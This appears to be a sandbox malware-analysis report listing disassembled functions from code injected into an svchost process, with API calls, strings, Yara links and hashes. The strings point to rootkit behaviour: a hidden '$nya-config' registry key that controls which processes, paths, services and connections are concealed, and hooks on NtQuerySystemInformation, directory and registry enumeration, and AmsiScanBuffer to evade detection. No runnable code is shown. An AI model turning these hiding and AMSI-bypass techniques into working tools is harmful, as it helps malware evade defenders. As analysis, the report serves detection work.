Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 9fce71c9a29af2153e04d3c8ac59f81a753fc28d7b0045cb35c7bbb718930c7b
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 1DA1E632704F8049FB22DBF594A13FD6BE3E781B98F544115DA9937AA9CA38D44BE700

Function 00000195DD5CDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000195DD5CDB99
FindNextFileW.KERNEL32 ref: 00000195DD5CDCCF
FindClose.KERNEL32 ref: 00000195DD5CDD0F
FindClose.KERNEL32 ref: 00000195DD5CDD3B

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 1f9ae77d44ffdda734c7c92040a980be7ef4117f9762ba0efd2a7da8fe2ece25
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 0DA1F832705E84C9FB229BFAD8A03ED6BE2E781794F144116DE99F7E99DA78C441C700

Function 00000195DE1A1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000195DE1A172F
HeapAlloc.KERNEL32 ref: 00000195DE1A173E

Part of subcall function 00000195DE1A1264: GetProcessHeap.KERNEL32 ref: 00000195DE1A126A
Part of subcall function 00000195DE1A1264: HeapAlloc.KERNEL32 ref: 00000195DE1A1279
Part of subcall function 00000195DE1A1264: GetProcessHeap.KERNEL32 ref: 00000195DE1A1293
Part of subcall function 00000195DE1A1264: HeapAlloc.KERNEL32 ref: 00000195DE1A12A4

Part of subcall function 00000195DE1A1000: GetProcessHeap.KERNEL32 ref: 00000195DE1A1006
Part of subcall function 00000195DE1A1000: HeapAlloc.KERNEL32 ref: 00000195DE1A1015
Part of subcall function 00000195DE1A1000: GetProcessHeap.KERNEL32 ref: 00000195DE1A1028
Part of subcall function 00000195DE1A1000: HeapAlloc.KERNEL32 ref: 00000195DE1A1037

RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A17AE
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A17DB
RegCloseKey.ADVAPI32 ref: 00000195DE1A17F5
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A1815
RegCloseKey.ADVAPI32 ref: 00000195DE1A1830
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A1850
RegCloseKey.ADVAPI32 ref: 00000195DE1A186B
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A188B
RegCloseKey.ADVAPI32 ref: 00000195DE1A18A6
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A18C6
RegCloseKey.ADVAPI32 ref: 00000195DE1A18E1
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A1901
RegCloseKey.ADVAPI32 ref: 00000195DE1A191C
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A193C
RegCloseKey.ADVAPI32 ref: 00000195DE1A1957
RegOpenKeyExW.ADVAPI32 ref: 00000195DE1A1977
RegCloseKey.ADVAPI32 ref: 00000195DE1A1992
RegCloseKey.ADVAPI32 ref: 00000195DE1A199C

Part of subcall function 00000195DE1A12B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000195DE1A1315
Part of subcall function 00000195DE1A12B8: GetProcessHeap.KERNEL32 ref: 00000195DE1A1323
Part of subcall function 00000195DE1A12B8: HeapAlloc.KERNEL32 ref: 00000195DE1A1334
Part of subcall function 00000195DE1A12B8: RegEnumValueW.ADVAPI32 ref: 00000195DE1A1393
Part of subcall function 00000195DE1A12B8: GetProcessHeap.KERNEL32 ref: 00000195DE1A13DB
Part of subcall function 00000195DE1A12B8: HeapAlloc.KERNEL32 ref: 00000195DE1A13E9
Part of subcall function 00000195DE1A12B8: GetProcessHeap.KERNEL32 ref: 00000195DE1A1406
Part of subcall function 00000195DE1A12B8: HeapFree.KERNEL32 ref: 00000195DE1A1414
Part of subcall function 00000195DE1A12B8: lstrlenW.KERNEL32 ref: 00000195DE1A141D
Part of subcall function 00000195DE1A12B8: GetProcessHeap.KERNEL32 ref: 00000195DE1A142B
Part of subcall function 00000195DE1A12B8: HeapAlloc.KERNEL32 ref: 00000195DE1A1439

Strings

process_names, xrefs: 00000195DE1A1849
tcp_local, xrefs: 00000195DE1A18FA
pid, xrefs: 00000195DE1A180E
SOFTWARE\$nya-config, xrefs: 00000195DE1A178E
tcp_remote, xrefs: 00000195DE1A1935
startup, xrefs: 00000195DE1A17D1
service_names, xrefs: 00000195DE1A18BF
paths, xrefs: 00000195DE1A1884
udp, xrefs: 00000195DE1A1970

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: bb14bdb563abb96b09d7b5ebf23ced4e8d4917718ad85786fdb87d6f3c9e7613
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 19712776710F1485EB22DFE1E8A16EC33A6FB99B89F441112DE4E63B28DE38D449D340

Function 00000195DD5C1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000195DD5C172F
HeapAlloc.KERNEL32 ref: 00000195DD5C173E

Part of subcall function 00000195DD5C1264: GetProcessHeap.KERNEL32 ref: 00000195DD5C126A
Part of subcall function 00000195DD5C1264: HeapAlloc.KERNEL32 ref: 00000195DD5C1279
Part of subcall function 00000195DD5C1264: GetProcessHeap.KERNEL32 ref: 00000195DD5C1293
Part of subcall function 00000195DD5C1264: HeapAlloc.KERNEL32 ref: 00000195DD5C12A4

Part of subcall function 00000195DD5C1000: GetProcessHeap.KERNEL32 ref: 00000195DD5C1006
Part of subcall function 00000195DD5C1000: HeapAlloc.KERNEL32 ref: 00000195DD5C1015
Part of subcall function 00000195DD5C1000: GetProcessHeap.KERNEL32 ref: 00000195DD5C1028
Part of subcall function 00000195DD5C1000: HeapAlloc.KERNEL32 ref: 00000195DD5C1037

RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17AE
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17DB
RegCloseKey.ADVAPI32 ref: 00000195DD5C17F5
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1815
RegCloseKey.ADVAPI32 ref: 00000195DD5C1830
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1850
RegCloseKey.ADVAPI32 ref: 00000195DD5C186B
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C188B
RegCloseKey.ADVAPI32 ref: 00000195DD5C18A6
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C18C6
RegCloseKey.ADVAPI32 ref: 00000195DD5C18E1
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1901
RegCloseKey.ADVAPI32 ref: 00000195DD5C191C
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C193C
RegCloseKey.ADVAPI32 ref: 00000195DD5C1957
RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1977
RegCloseKey.ADVAPI32 ref: 00000195DD5C1992
RegCloseKey.ADVAPI32 ref: 00000195DD5C199C

Part of subcall function 00000195DD5C12B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000195DD5C1315
Part of subcall function 00000195DD5C12B8: GetProcessHeap.KERNEL32 ref: 00000195DD5C1323
Part of subcall function 00000195DD5C12B8: HeapAlloc.KERNEL32 ref: 00000195DD5C1334
Part of subcall function 00000195DD5C12B8: RegEnumValueW.ADVAPI32 ref: 00000195DD5C1393
Part of subcall function 00000195DD5C12B8: GetProcessHeap.KERNEL32 ref: 00000195DD5C13DB
Part of subcall function 00000195DD5C12B8: HeapAlloc.KERNEL32 ref: 00000195DD5C13E9
Part of subcall function 00000195DD5C12B8: GetProcessHeap.KERNEL32 ref: 00000195DD5C1406
Part of subcall function 00000195DD5C12B8: HeapFree.KERNEL32 ref: 00000195DD5C1414
Part of subcall function 00000195DD5C12B8: lstrlenW.KERNEL32 ref: 00000195DD5C141D
Part of subcall function 00000195DD5C12B8: GetProcessHeap.KERNEL32 ref: 00000195DD5C142B
Part of subcall function 00000195DD5C12B8: HeapAlloc.KERNEL32 ref: 00000195DD5C1439

Strings

tcp_remote, xrefs: 00000195DD5C1935
startup, xrefs: 00000195DD5C17D1
udp, xrefs: 00000195DD5C1970
SOFTWARE\$nya-config, xrefs: 00000195DD5C178E
tcp_local, xrefs: 00000195DD5C18FA
service_names, xrefs: 00000195DD5C18BF
paths, xrefs: 00000195DD5C1884
process_names, xrefs: 00000195DD5C1849
pid, xrefs: 00000195DD5C180E

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 97e7a92b98bbf8ab3f417e885f16f1c5c92645046321fbf9193d7dc8724b8e5f
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: BB714D36311E5486EB219FAAE860BDC23E6FB89B89F405111DE4EA7F68EF34C444C350

Function 00000195DE1A1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000195DE1A1E7F

Part of subcall function 00000195DE1A22A8: GetModuleHandleA.KERNEL32(?,?,?,00000195DE1A1EB1), ref: 00000195DE1A22C0
Part of subcall function 00000195DE1A22A8: GetProcAddress.KERNEL32(?,?,?,00000195DE1A1EB1), ref: 00000195DE1A22D1

CreateThread.KERNEL32 ref: 00000195DE1A2043
TlsAlloc.KERNEL32 ref: 00000195DE1A2049
TlsAlloc.KERNEL32 ref: 00000195DE1A2055
TlsAlloc.KERNEL32 ref: 00000195DE1A2061
TlsAlloc.KERNEL32 ref: 00000195DE1A206D
TlsAlloc.KERNEL32 ref: 00000195DE1A2079
TlsAlloc.KERNEL32 ref: 00000195DE1A2085

Strings

EnumServiceGroupW, xrefs: 00000195DE1A1F50
AmsiScanBuffer, xrefs: 00000195DE1A2012
NtEnumerateKey, xrefs: 00000195DE1A1F19
advapi32.dll, xrefs: 00000195DE1A1F57, 00000195DE1A1F78
pdh.dll, xrefs: 00000195DE1A1FD7, 00000195DE1A1FF8
NtQuerySystemInformation, xrefs: 00000195DE1A1EA5
sechost.dll, xrefs: 00000195DE1A1F99
NtQueryDirectoryFile, xrefs: 00000195DE1A1EDF
EnumServicesStatusExW, xrefs: 00000195DE1A1F71, 00000195DE1A1F92
PdhGetRawCounterArrayW, xrefs: 00000195DE1A1FD0
NtEnumerateValueKey, xrefs: 00000195DE1A1F36
amsi.dll, xrefs: 00000195DE1A2019
ntdll.dll, xrefs: 00000195DE1A1E8D
NtQueryDirectoryFileEx, xrefs: 00000195DE1A1EFC
NtDeviceIoControlFile, xrefs: 00000195DE1A1FB6
NtResumeThread, xrefs: 00000195DE1A1EC2
PdhGetFormattedCounterArrayW, xrefs: 00000195DE1A1FF1

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 9f14184b953213554cc87f29641866dcf7eaac0ef6360da18791f94a30c2e7d3
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: F051AEB4790E4AA5EB03EFE4EC727E463A3B795345FC40513A409B2561DE38A25FE384

Function 00000195DE1A12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000195DE1A1315
GetProcessHeap.KERNEL32 ref: 00000195DE1A1323
HeapAlloc.KERNEL32 ref: 00000195DE1A1334
RegEnumValueW.ADVAPI32 ref: 00000195DE1A1393

Part of subcall function 00000195DE1A1530: StrCmpIW.SHLWAPI ref: 00000195DE1A1561

GetProcessHeap.KERNEL32 ref: 00000195DE1A13DB
HeapAlloc.KERNEL32 ref: 00000195DE1A13E9
GetProcessHeap.KERNEL32 ref: 00000195DE1A1406
HeapFree.KERNEL32 ref: 00000195DE1A1414
lstrlenW.KERNEL32 ref: 00000195DE1A141D
GetProcessHeap.KERNEL32 ref: 00000195DE1A142B
HeapAlloc.KERNEL32 ref: 00000195DE1A1439
StrCpyW.SHLWAPI ref: 00000195DE1A145B
GetProcessHeap.KERNEL32 ref: 00000195DE1A1472
HeapFree.KERNEL32 ref: 00000195DE1A1480

Strings

d, xrefs: 00000195DE1A1356

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: dca91009f5b6c3f2e5717fe52d00770d2190f70ac6976afee63b6a984da106b4
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 00515A72310B849AE762CFA2E8693AA77E3F789F99F444124DE4917718DF38D04A9700

Function 00000195DD5C12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000195DD5C1315
GetProcessHeap.KERNEL32 ref: 00000195DD5C1323
HeapAlloc.KERNEL32 ref: 00000195DD5C1334
RegEnumValueW.ADVAPI32 ref: 00000195DD5C1393

Part of subcall function 00000195DD5C1530: StrCmpIW.SHLWAPI ref: 00000195DD5C1561

GetProcessHeap.KERNEL32 ref: 00000195DD5C13DB
HeapAlloc.KERNEL32 ref: 00000195DD5C13E9
GetProcessHeap.KERNEL32 ref: 00000195DD5C1406
HeapFree.KERNEL32 ref: 00000195DD5C1414
lstrlenW.KERNEL32 ref: 00000195DD5C141D
GetProcessHeap.KERNEL32 ref: 00000195DD5C142B
HeapAlloc.KERNEL32 ref: 00000195DD5C1439
StrCpyW.SHLWAPI ref: 00000195DD5C145B
GetProcessHeap.KERNEL32 ref: 00000195DD5C1472
HeapFree.KERNEL32 ref: 00000195DD5C1480

Strings

d, xrefs: 00000195DD5C1356

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: f8f13489960f951edd332fd126e8a9159bb7fd1435c66fd568b93207f930b5f5
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: C8517D32201F849AE721CFA6E46879A77E2F789F99F444124DE8A57B18DF7CC049CB10

Function 00000195DE1AEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000195DE1AF34A,?,?,00000000,00000195DE1AF2CD), ref: 00000195DE1AEFF5
GetLastError.KERNEL32(?,?,00000000,00000195DE1AF2CD), ref: 00000195DE1AF007
LoadLibraryExW.KERNEL32(?,?,00000000,00000195DE1AF2CD), ref: 00000195DE1AF049
VirtualProtect.KERNEL32 ref: 00000195DE1AF0A5
VirtualProtect.KERNEL32 ref: 00000195DE1AF0D6
FreeLibrary.KERNEL32(?,?,00000000,00000195DE1AF2CD), ref: 00000195DE1AF11A
GetProcAddress.KERNEL32(?,?,00000000,00000195DE1AF2CD), ref: 00000195DE1AF126

Strings

api-ms-, xrefs: 00000195DE1AF01B
ext-ms-, xrefs: 00000195DE1AF02E
AppPolicyGetProcessTerminationMethod, xrefs: 00000195DE1AF157, 00000195DE1AF165

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: dec67ef8ba282fc86257733b78379fbe83c4263940246cd14987be4d190be04e
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: F9518B31701F0451EB17DBE6A8213E922D2AB99BB0F5807259E3D673D0EF38E44AA750

Function 00000195DD5CEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000195DD5CF34A,?,?,00000000,00000195DD5CF2CD), ref: 00000195DD5CEFF5
GetLastError.KERNEL32(?,?,00000000,00000195DD5CF2CD), ref: 00000195DD5CF007
LoadLibraryExW.KERNEL32(?,?,00000000,00000195DD5CF2CD), ref: 00000195DD5CF049
VirtualProtect.KERNEL32 ref: 00000195DD5CF0A5
VirtualProtect.KERNEL32 ref: 00000195DD5CF0D6
FreeLibrary.KERNEL32(?,?,00000000,00000195DD5CF2CD), ref: 00000195DD5CF11A
GetProcAddress.KERNEL32(?,?,00000000,00000195DD5CF2CD), ref: 00000195DD5CF126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 00000195DD5CF157, 00000195DD5CF165
api-ms-, xrefs: 00000195DD5CF01B
ext-ms-, xrefs: 00000195DD5CF02E

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: f3272709e7377aa56bcab629b0f4fd3e97f839f10e7653b33cfe26bb6b53a4e5
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 1451B435702F0851EB169B9AE8203E523E2BB49BB1F4847259D3EA7BC4DF38C449C750

Function 00000195DE1A33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000195DE1A33FD
GetProcessHeap.KERNEL32 ref: 00000195DE1A3412
HeapAlloc.KERNEL32 ref: 00000195DE1A3420
PdhGetCounterInfoW.PDH ref: 00000195DE1A3436
StrCmpW.SHLWAPI ref: 00000195DE1A344B

Part of subcall function 00000195DE1A3950: StrCmpNW.SHLWAPI ref: 00000195DE1A3972
Part of subcall function 00000195DE1A3950: StrStrW.SHLWAPI ref: 00000195DE1A3990
Part of subcall function 00000195DE1A3950: StrToIntW.SHLWAPI ref: 00000195DE1A39B7

GetProcessHeap.KERNEL32 ref: 00000195DE1A3488
HeapFree.KERNEL32 ref: 00000195DE1A3496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000195DE1A3444

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 7d2a1bd9338de5041769bb6f010ffff08f086095355e4c008bee6e442592cdae
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 8731AE32B04F4096E723CFD2A8147A9B3E2F798BD5F4405299E49A3A24DF38E45AD740

Function 00000195DD5C33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000195DD5C33FD
GetProcessHeap.KERNEL32 ref: 00000195DD5C3412
HeapAlloc.KERNEL32 ref: 00000195DD5C3420
PdhGetCounterInfoW.PDH ref: 00000195DD5C3436
StrCmpW.SHLWAPI ref: 00000195DD5C344B

Part of subcall function 00000195DD5C3950: StrCmpNW.SHLWAPI ref: 00000195DD5C3972
Part of subcall function 00000195DD5C3950: StrStrW.SHLWAPI ref: 00000195DD5C3990
Part of subcall function 00000195DD5C3950: StrToIntW.SHLWAPI ref: 00000195DD5C39B7

GetProcessHeap.KERNEL32 ref: 00000195DD5C3488
HeapFree.KERNEL32 ref: 00000195DD5C3496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000195DD5C3444

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
